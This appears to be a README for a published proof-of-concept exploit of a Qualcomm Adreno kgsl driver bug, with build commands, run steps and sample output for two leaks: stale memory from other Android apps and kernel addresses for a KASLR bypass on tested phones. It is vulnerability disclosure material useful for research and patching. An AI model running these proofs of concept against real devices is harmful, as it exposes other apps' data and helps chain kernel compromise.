The write up can be found here. This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used to leak information in other user apps, as well as in the kernel from an untrusted app.
The directory adreno_user contains a proof-of-concept for leaking memory from other applications. It'll repeatedly trigger the bug and read the stale information contained in memory pages. There is no telling or control over what information is being leaked. To test this, compile with the following command:
aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user
and then push adreno_user to the device and run it. It should print out non zero memory content:
flame:/ $ /data/local/tmp/adreno_user
hexdump(0x50000000, 0x190)
00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......|
00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|
00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
00000050 cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00 |..g.s...........|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000a0 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
.......
The directory adreno_kernel contains a proof-of-concept for leaking kernel information for KASLR bypass. It'll repeatedly trigger the bug and tries to leak kernel addresses. Depending on whether the device is running kernel branch 4.x or 5.x, the Macro KERNEL_BRANCH in adreno_kernel.c should be set to either 4 or 5.
To test, compile with
aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o adreno_kernel
and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions:
flame:/ $ /data/local/tmp/adreno_kernel
found dma fence object:
kgsl_syncsource_fence_ops address: ffffff9daaea8b48
object address: fffffffe116100a0
syncsource address: fffffffe0b244480
It has been tested on a number of devices. The time it takes (depends on the success rate of a single leak) varies across devices. It is relatively quick Pixel 4, but takes longer on the Samsung Z flip 3.